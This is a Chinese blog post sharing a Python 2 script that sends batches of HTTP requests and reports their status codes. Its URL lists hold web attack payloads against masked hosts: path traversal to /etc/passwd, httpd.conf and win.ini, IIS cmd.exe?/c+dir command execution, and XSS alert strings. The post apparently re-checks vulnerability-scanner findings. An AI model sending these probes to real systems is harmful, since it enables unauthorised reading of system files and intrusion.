zoukankan      html  css  js  c++  java
  • Python 简单批量请求接口实例

    #coding:utf-8
    '''
    Created on 2017年11月10日
    
    @author: li.liu
    '''
    import urllib
    import time
    
    
    str1='''
    http://source.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''
    http://sso.xxxxx.com/../<script>alert(6)</script>
    http://source.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-+AC8-SCRIPT+AD4-.ida
    http://www.xxxxx.com/../<script>alert(7)</script>
    http://search.xxxxx.com/search/webSearchNeed?categoryName=%E5%93%81%E7%89%8C
    http://source.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''
    http://source.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2bAC8-SCRIPT%2bAD4-.ida
    http://stylist.xxxxx.com/%3Cscript%3Ealert(1234)%3C/script%3E
    http://stylist.xxxxx.com/%3Cscript%3Ealert(1234)%3C/script%3E
    http://source.xxxxx.com/index
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://source.xxxxx.com/index%23.%23php
    http://sso.xxxxx.com/.nsf/../winnt/win.ini
    http://sso.xxxxx.com/%00%00.nsf/../winnt/win.ini
    http://sso.xxxxx.com/%00%20.nsf/../winnt/win.ini
    http://sso.xxxxx.com/%00%c0%af.nsf/../winnt/win.ini
    http://sso.xxxxx.com/%00...nsf/../winnt/win.ini
    http://sso.xxxxx.com/%00.nsf//../winnt/win.ini
    http://www.xxxxx.com/.nsf/../winnt/win.ini
    http://sso.xxxxx.com/%00.nsf/../winnt/win.ini
    http://www.xxxxx.com/%00%00.nsf/../winnt/win.ini
    http://www.xxxxx.com/%00%20.nsf/../winnt/win.ini
    http://sso.xxxxx.com/%00.nsf/..//winnt/win.ini
    http://www.xxxxx.com/%00%c0%af.nsf/../winnt/win.ini
    http://www.xxxxx.com/%00...nsf/../winnt/win.ini
    http://sso.xxxxx.com/%00.nsf/../../winnt/win.ini
    http://www.xxxxx.com/%00.nsf//../winnt/win.ini
    http://www.xxxxx.com/%00.nsf/../winnt/win.ini
    http://sso.xxxxx.com/%00.nsf.nsf/../winnt/win.ini
    http://www.xxxxx.com/%00.nsf/..//winnt/win.ini
    http://sso.xxxxx.com/%20%00.nsf/../winnt/win.ini
    http://search.xxxxx.com/search/webSearchNeed?categoryName=%E5%93%81%E7%89%8C
    http://www.xxxxx.com/%00.nsf/../../winnt/win.ini
    http://sso.xxxxx.com/%20.nsf//../winnt/win.ini
    http://www.xxxxx.com/%00.nsf.nsf/../winnt/win.ini
    http://sso.xxxxx.com/%20.nsf/..//winnt/win.ini
    http://www.xxxxx.com/%20%00.nsf/../winnt/win.ini
    http://sso.xxxxx.com/%c0%af%00.nsf/../winnt/win.ini
    http://stylist.xxxxx.com/../<script>alert(9)</script>
    http://sso.xxxxx.com/%c0%af.nsf//../winnt/win.ini
    http://source.xxxxx.com/*.jsp/
    http://www.xxxxx.com/%20.nsf//../winnt/win.ini
    http://sso.xxxxx.com:443
    http://sso.xxxxx.com/%c0%af.nsf/..//winnt/win.ini
    http://www.xxxxx.com/%20.nsf/..//winnt/win.ini
    http://www.xxxxx.com/%c0%af%00.nsf/../winnt/win.ini
    http://www.xxxxx.com/%c0%af.nsf//../winnt/win.ini
    http://www.xxxxx.com/%c0%af.nsf/..//winnt/win.ini
    http://www.xxxxx.com/...nsf//../winnt/win.ini
    http://source.xxxxx.com:8080/C:%5Cwinnt%5Cwin.ini
    http://www.xxxxx.com/...nsf/..//winnt/win.ini
    http://sso.xxxxx.com/...nsf//../winnt/win.ini
    http://sso.xxxxx.com/...nsf/..//winnt/win.ini
    http://sso.xxxxx.com/.nsf///../winnt/win.ini
    http://sso.xxxxx.com/.nsf//../winnt/win.ini
    http://sso.xxxxx.com/.nsf//..//winnt/win.ini
    http://www.xxxxx.com/.nsf///../winnt/win.ini
    http://www.xxxxx.com:443
    http://search.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''
    http://search.xxxxx.com:8080/C:%5Cwinnt%5Cwin.ini
    http://search.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-+AC8-SCRIPT+AD4-.ida
    http://search.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''
    http://search.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2bAC8-SCRIPT%2bAD4-.ida
    http://stylist.xxxxx.com/.nsf/../winnt/win.ini
    http://sso.xxxxx.com/.nsf/../winnt/win.ini
    http://stylist.xxxxx.com/%00%00.nsf/../winnt/win.ini
    http://sso.xxxxx.com/.nsf/..//winnt/win.ini
    http://stylist.xxxxx.com/%00%20.nsf/../winnt/win.ini
    http://sso.xxxxx.com/.nsf/..///winnt/win.ini
    http://sso.xxxxx.com/.nsf%00.nsf/../winnt/win.ini
    http://stylist.xxxxx.com/%00%c0%af.nsf/../winnt/win.ini
    http://sso.xxxxx.com/.nsf.nsf//../winnt/win.ini
    http://stylist.xxxxx.com/%00...nsf/../winnt/win.ini
    http://sso.xxxxx.com/.nsf.nsf/..//winnt/win.ini
    http://sso.xxxxx.com/.nsf/../winnt/win.ini
    http://stylist.xxxxx.com/%00.nsf//../winnt/win.ini
    http://sso.xxxxx.com/.nsf/..//winnt/win.ini
    http://stylist.xxxxx.com/%00.nsf/../winnt/win.ini
    http://sso.xxxxx.com/.nsf/..///winnt/win.ini
    http://sso.xxxxx.com/.nsf%00.nsf/../winnt/win.ini
    http://stylist.xxxxx.com/%00.nsf/..//winnt/win.ini
    http://sso.xxxxx.com/.nsf.nsf//../winnt/win.ini
    http://stylist.xxxxx.com/%00.nsf/../../winnt/win.ini
    http://sso.xxxxx.com/.nsf.nsf/..//winnt/win.ini
    http://source.xxxxx.com/////////////
    http://sso.xxxxx.com//
    http://stylist.xxxxx.com/%00.nsf.nsf/../winnt/win.ini
    http://www.xxxxx.com//
    http://search.xxxxx.com/index
    http://stylist.xxxxx.com/%20%00.nsf/../winnt/win.ini
    http://search.xxxxx.com/index%23.%23php
    http://www.xxxxx.com/.nsf//../winnt/win.ini
    http://stylist.xxxxx.com:443
    http://stylist.xxxxx.com/%20.nsf//../winnt/win.ini
    http://www.xxxxx.com/.nsf//..//winnt/win.ini
    http://www.xxxxx.com/.nsf/../winnt/win.ini
    http://www.xxxxx.com/.nsf/..//winnt/win.ini
    http://www.xxxxx.com/.nsf/..///winnt/win.ini
    http://www.xxxxx.com/.nsf%00.nsf/../winnt/win.ini
    http://sso.xxxxx.com/sso/pc-login
    http://www.xxxxx.com/.nsf.nsf//../winnt/win.ini
    http://sso.xxxxx.com/sso/NonExistentFile
    http://www.xxxxx.com/
    http://www.xxxxx.com/.nsf.nsf/..//winnt/win.ini
    http://www.xxxxx.com/.nsf/../winnt/win.ini
    http://stylist.xxxxx.com/%20.nsf/..//winnt/win.ini
    http://stylist.xxxxx.com/%c0%af%00.nsf/../winnt/win.ini
    http://stylist.xxxxx.com/%c0%af.nsf//../winnt/win.ini
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/.nsf/..//winnt/win.ini
    http://www.xxxxx.com/.nsf/..///winnt/win.ini
    http://search.xxxxx.com/*.jsp/
    http://stylist.xxxxx.com//
    http://www.xxxxx.com/.nsf%00.nsf/../winnt/win.ini
    http://source.xxxxx.com/c/winnt/system32/cmd.exe?/c+dir
    http://www.xxxxx.com/.nsf.nsf//../winnt/win.ini
    http://sso.xxxxx.com:8080/C:%5Cboot.ini
    http://www.xxxxx.com:8080/C:%5Cboot.ini
    http://www.xxxxx.com/.nsf.nsf/..//winnt/win.ini
    http://search.xxxxx.com/////////////
    http://stylist.xxxxx.com/html/pingtaisheji.html
    http://stylist.xxxxx.com/html/NonExistentFile.html
    http://source.xxxxx.com/d/winnt/system32/cmd.exe?/c+dir
    http://sso.xxxxx.com/sso/pc-login
    http://www.xxxxx.com/
    http://stylist.xxxxx.com/%c0%af.nsf/..//winnt/win.ini
    http://stylist.xxxxx.com/...nsf//../winnt/win.ini
    http://stylist.xxxxx.com/...nsf/..//winnt/win.ini
    http://stylist.xxxxx.com/.nsf///../winnt/win.ini
    http://stylist.xxxxx.com/.nsf//../winnt/win.ini
    http://stylist.xxxxx.com/.nsf//..//winnt/win.ini
    http://stylist.xxxxx.com/.nsf/../winnt/win.ini
    http://stylist.xxxxx.com:8080/C:%5Cboot.ini
    http://stylist.xxxxx.com/.nsf/..//winnt/win.ini
    http://source.xxxxx.com/../../../../../../../etc/passwd
    http://source.xxxxx.com/../../../../../../../etc/httpd/conf/httpd.conf
    http://source.xxxxx.com/../../../../../../../www/conf/httpd.conf
    http://sso.xxxxx.com/sso/pc-login
    http://www.xxxxx.com/
    http://search.xxxxx.com/c/winnt/system32/cmd.exe?/c+dir
    http://stylist.xxxxx.com/.nsf/..///winnt/win.ini
    http://stylist.xxxxx.com/html/pingtaisheji.html
    http://stylist.xxxxx.com/.nsf%00.nsf/../winnt/win.ini
    http://stylist.xxxxx.com/.nsf.nsf//../winnt/win.ini
    http://stylist.xxxxx.com/.nsf.nsf/..//winnt/win.ini
    http://stylist.xxxxx.com/.nsf/../winnt/win.ini
    http://stylist.xxxxx.com/.nsf/..//winnt/win.ini
    http://stylist.xxxxx.com/.nsf/..///winnt/win.ini
    http://stylist.xxxxx.com/.nsf%00.nsf/../winnt/win.ini
    http://stylist.xxxxx.com/.nsf.nsf//../winnt/win.ini
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://stylist.xxxxx.com/.nsf.nsf/..//winnt/win.ini
    http://source.xxxxx.com:8080/%20..\%20..\%20..\%20..\%20..\%20..\%20..winntwin.ini
    http://sso.xxxxx.com/sso/pc-login
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://search.xxxxx.com/d/winnt/system32/cmd.exe?/c+dir
    http://stylist.xxxxx.com/html/pingtaisheji.html
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://source.xxxxx.com:8080/%20
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://sso.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''
    http://sso.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-+AC8-SCRIPT+AD4-.ida
    http://sso.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''
    http://sso.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2bAC8-SCRIPT%2bAD4-.ida
    http://www.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''
    http://www.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-+AC8-SCRIPT+AD4-.ida
    http://www.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''
    http://search.xxxxx.com/../../../../../../../etc/passwd
    http://www.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2bAC8-SCRIPT%2bAD4-.ida
    http://search.xxxxx.com/../../../../../../../etc/httpd/conf/httpd.conf
    http://stylist.xxxxx.com/html/pingtaisheji.html
    http://search.xxxxx.com/../../../../../../../www/conf/httpd.conf
    http://sso.xxxxx.com/index
    http://sso.xxxxx.com/index%23.%23php
    http://www.xxxxx.com/index
    http://www.xxxxx.com/index%23.%23php
    http://search.xxxxx.com:8080/%20..\%20..\%20..\%20..\%20..\%20..\%20..winntwin.ini
    http://stylist.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''
    http://stylist.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-+AC8-SCRIPT+AD4-.ida
    http://stylist.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''
    http://stylist.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2bAC8-SCRIPT%2bAD4-.ida
    http://sso.xxxxx.com/*.jsp/
    http://www.xxxxx.com/*.jsp/
    http://search.xxxxx.com:8080/%20
    http://stylist.xxxxx.com/index
    http://sso.xxxxx.com/////////////
    http://www.xxxxx.com/////////////
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://stylist.xxxxx.com/*.jsp/
    http://stylist.xxxxx.com/////////////
    http://sso.xxxxx.com/c/winnt/system32/cmd.exe?/c+dir
    http://stylist.xxxxx.com/index%23.%23php
    http://www.xxxxx.com/c/winnt/system32/cmd.exe?/c+dir
    http://source.xxxxx.com/sourcePc/news
    http://sso.xxxxx.com/d/winnt/system32/cmd.exe?/c+dir
    http://sso.xxxxx.com:8080/C:%5Cwinnt%5Cwin.ini
    http://www.xxxxx.com:8080/C:%5Cwinnt%5Cwin.ini
    http://www.xxxxx.com/d/winnt/system32/cmd.exe?/c+dir
    http://stylist.xxxxx.com/c/winnt/system32/cmd.exe?/c+dir
    http://sso.xxxxx.com/../../../../../../../etc/passwd
    http://sso.xxxxx.com/../../../../../../../etc/httpd/conf/httpd.conf
    http://stylist.xxxxx.com:8080/C:%5Cwinnt%5Cwin.ini
    http://sso.xxxxx.com/../../../../../../../www/conf/httpd.conf
    http://www.xxxxx.com/../../../../../../../etc/passwd
    http://www.xxxxx.com/../../../../../../../etc/httpd/conf/httpd.conf
    http://www.xxxxx.com/../../../../../../../www/conf/httpd.conf
    http://stylist.xxxxx.com/d/winnt/system32/cmd.exe?/c+dir
    http://sso.xxxxx.com:8080/%20..\%20..\%20..\%20..\%20..\%20..\%20..winntwin.ini
    http://www.xxxxx.com:8080/%20..\%20..\%20..\%20..\%20..\%20..\%20..winntwin.ini
    http://search.xxxxx.com/search/webSearchNeed?categoryName=%E5%93%81%E7%89%8C
    http://stylist.xxxxx.com/../../../../../../../etc/passwd
    http://stylist.xxxxx.com/../../../../../../../etc/httpd/conf/httpd.conf
    http://stylist.xxxxx.com/../../../../../../../www/conf/httpd.conf
    http://source.xxxxx.com/sourcePc/news
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://www.xxxxx.com/
    http://sso.xxxxx.com:8080/%20
    http://www.xxxxx.com/
    '''
    str2='''
    http://sso.xxxxx.com:8080/%20
    http://sso.xxxxx.com/*.jsp/
    http://search.xxxxx.com/*.jsp/
    http://www.xxxxx.com:8080/C:%5Cboot.ini
    http://sso.xxxxx.com:443
    http://stylist.xxxxx.com/html/NonExistentFile.html
    http://search.xxxxx.com/index%23.%23php
    http://source.xxxxx.com:8080/%20
    http://source.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''
    http://search.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''
    http://www.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''
    http://www.xxxxx.com:443
    http://stylist.xxxxx.com/index
    http://sso.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''
    http://stylist.xxxxx.com/index%23.%23php
    http://stylist.xxxxx.com/*.jsp/
    http://sso.xxxxx.com/../<script>alert(6)</script>
    http://search.xxxxx.com/search/webSearchNeed?categoryName=%E5%93%81%E7%89%8C
    http://stylist.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''
    http://sso.xxxxx.com/index%23.%23php
    http://stylist.xxxxx.com:443
    http://www.xxxxx.com/../<script>alert(7)</script>
    http://stylist.xxxxx.com/../<script>alert(9)</script>
    http://source.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''
    http://source.xxxxx.com/sourcePc/news
    http://www.xxxxx.com//
    http://stylist.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''
    http://www.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''
    http://www.xxxxx.com/index%23.%23php
    http://search.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''
    http://sso.xxxxx.com/index
    http://search.xxxxx.com:8080/%20
    http://search.xxxxx.com/index
    http://sso.xxxxx.com:8080/C:%5Cboot.ini
    http://stylist.xxxxx.com/%3Cscript%3Ealert(1234)%3C/script%3E
    http://source.xxxxx.com/////////////
    http://stylist.xxxxx.com/html/pingtaisheji.html
    http://search.xxxxx.com/////////////
    http://stylist.xxxxx.com/////////////
    http://www.xxxxx.com/
    http://stylist.xxxxx.com:8080/C:%5Cboot.ini
    http://stylist.xxxxx.com//
    http://sso.xxxxx.com/sso/NonExistentFile
    http://www.xxxxx.com/////////////
    http://sso.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''
    http://sso.xxxxx.com/////////////
    http://www.xxxxx.com/index
    http://sso.xxxxx.com//
    http://sso.xxxxx.com/sso/pc-login
    http://www.xxxxx.com/*.jsp/
    http://source.xxxxx.com/*.jsp/
    http://source.xxxxx.com/index%23.%23php
    http://source.xxxxx.com/index
    '''
    str3='''
    http://sso.xxxxx.com:8080/%20
    http://sso.xxxxx.com/*.jsp/
    http://search.xxxxx.com/*.jsp/
    http://sso.xxxxx.com:443
    http://stylist.xxxxx.com/html/NonExistentFile.html
    http://search.xxxxx.com/index%23.%23php
    http://source.xxxxx.com:8080/%20
    http://source.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''
    http://search.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''
    http://www.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''
    http://www.xxxxx.com:443
    http://stylist.xxxxx.com/index
    http://sso.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''
    http://stylist.xxxxx.com/index%23.%23php
    http://stylist.xxxxx.com/*.jsp/
    http://sso.xxxxx.com/../<script>alert(6)</script>
    http://search.xxxxx.com/search/webSearchNeed?categoryName=%E5%93%81%E7%89%8C
    http://stylist.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''
    http://search.xxxxx.com/../../../../../../../etc/passwd
    http://sso.xxxxx.com/index%23.%23php
    http://stylist.xxxxx.com:443
    http://www.xxxxx.com/../<script>alert(7)</script>
    http://stylist.xxxxx.com/../<script>alert(9)</script>
    http://source.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''
    http://source.xxxxx.com/sourcePc/news
    http://www.xxxxx.com//
    http://source.xxxxx.com/../../../../../../../etc/passwd
    http://stylist.xxxxx.com/../../../../../../../etc/passwd
    http://stylist.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''
    http://www.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''
    http://www.xxxxx.com/index%23.%23php
    http://www.xxxxx.com/../../../../../../../etc/passwd
    http://search.xxxxx.com/%2bADw-SCRIPT%2bAD4-alert(1234)%2bADw-%2fSCRIPT%2bAD4-.htw%3fCiWebHitsFile%3d%2fiisstart.asp%26CiRestriction%3d''
    http://sso.xxxxx.com/index
    http://search.xxxxx.com:8080/%20
    http://search.xxxxx.com/index
    http://stylist.xxxxx.com/%3Cscript%3Ealert(1234)%3C/script%3E
    http://source.xxxxx.com/////////////
    http://sso.xxxxx.com/../../../../../../../etc/passwd
    http://stylist.xxxxx.com/html/pingtaisheji.html
    http://search.xxxxx.com/////////////
    http://stylist.xxxxx.com/////////////
    http://www.xxxxx.com/
    http://stylist.xxxxx.com//
    http://sso.xxxxx.com/sso/NonExistentFile
    http://www.xxxxx.com/////////////
    http://sso.xxxxx.com/+ADw-SCRIPT+AD4-alert(1234)+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction=''
    http://sso.xxxxx.com/////////////
    http://www.xxxxx.com/index
    http://sso.xxxxx.com//
    http://sso.xxxxx.com/sso/pc-login
    http://www.xxxxx.com/*.jsp/
    http://source.xxxxx.com/*.jsp/
    http://source.xxxxx.com/index%23.%23php
    http://source.xxxxx.com/index
    '''
    str4='''
    http://search.xxxxx.com/../../../../../../../etc/passwd
    http://sso.xxxxx.com/../../../../../../../etc/passwd
    http://source.xxxxx.com/../../../../../../../etc/passwd
    http://www.xxxxx.com/../../../../../../../etc/passwd
    http://stylist.xxxxx.com/../../../../../../../etc/passwd
    '''
    str5='''
    http://search.xxxxx.com/../../../../../../../etc/passwd
    '''
    t=0
    a= str4.split('
    ')
    #print urllib.urlopen('http://www.baidu.com').code
    s=set()
    for i in a:
        if '.ida' in i or 'win.ini' in i or 'httpd.conf' in i or 'c+dir' in i :#or 'passwd' in i:
            pass
            #s.add(i)
        elif 'passwd' in i:
            #pass
            s.add(i)
        else:
            pass
            #s.add(i)
            
    #while True:    
    for j in s:
        t+=1
        #print len(s),'/',t
        
        print j
        
        try:
            url=j            
            print urllib.urlopen(url).code            
        except:
            print urllib.urlopen('http://www.xxxxx.com/').code
        #time.sleep(20)    
        ''''''

    返回请求码判断

  • 相关阅读:
    基于WebForm+EasyUI的业务管理系统形成之旅 -- 构建Web界面(Ⅴ)
    基于WebForm+EasyUI的业务管理系统形成之旅 -- 数据统计(Ⅳ)
    基于WebForm+EasyUI的业务管理系统形成之旅 -- 首页快捷方式(Ⅲ)
    基于WebForm+EasyUI的业务管理系统形成之旅 -- 登录窗口(Ⅱ)
    基于WebForm+EasyUI的业务管理系统形成之旅 -- 系统设置(Ⅰ)
    基于WebForm+EasyUI的业务管理系统形成之旅 -- 总体介绍
    LeetCode-Implement Queue using Stacks
    LeetCode-Implement Stack Using Queues
    LeetCode-Count Primes
    LeetCode-Reverse Bits
  • 原文地址:https://www.cnblogs.com/liuliu-word/p/8057766.html
Copyright © 2011-2022 走看看